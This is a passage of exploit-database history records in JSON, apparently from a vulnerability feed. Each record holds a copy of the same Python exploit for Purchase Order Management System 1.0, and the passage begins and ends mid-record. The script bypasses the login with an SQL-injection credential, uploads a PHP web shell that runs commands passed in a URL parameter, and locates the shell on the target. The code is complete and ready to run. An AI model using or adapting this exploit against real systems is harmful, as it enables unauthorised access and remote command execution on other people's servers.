\"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-10T22:42:59", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "4759c4dfa6398a7b295c6ed227d59780", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-12T10:56:23", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-10T22:42:59", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-10T22:42:59", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T10:56:23", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "84dd7c404e39624540c72ca76e0bed6b", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-12T23:05:49", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-12T23:05:49", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-12T23:05:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T23:05:49", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "0754323cb94c9357d7d13663ce896746", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-14T08:43:47", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T08:43:47", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-14T08:43:47", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T08:43:47", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "7c9cfaeffbd6721339c46b80b5d4d2b8", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-14T22:50:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-14T22:50:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:50:04", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "67ccbb7566c160a1f84328fe246fd42a", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-15T22:41:13", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-14T22:50:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:41:13", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "65093e7c0800854e37c07dfeb7308aca", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", 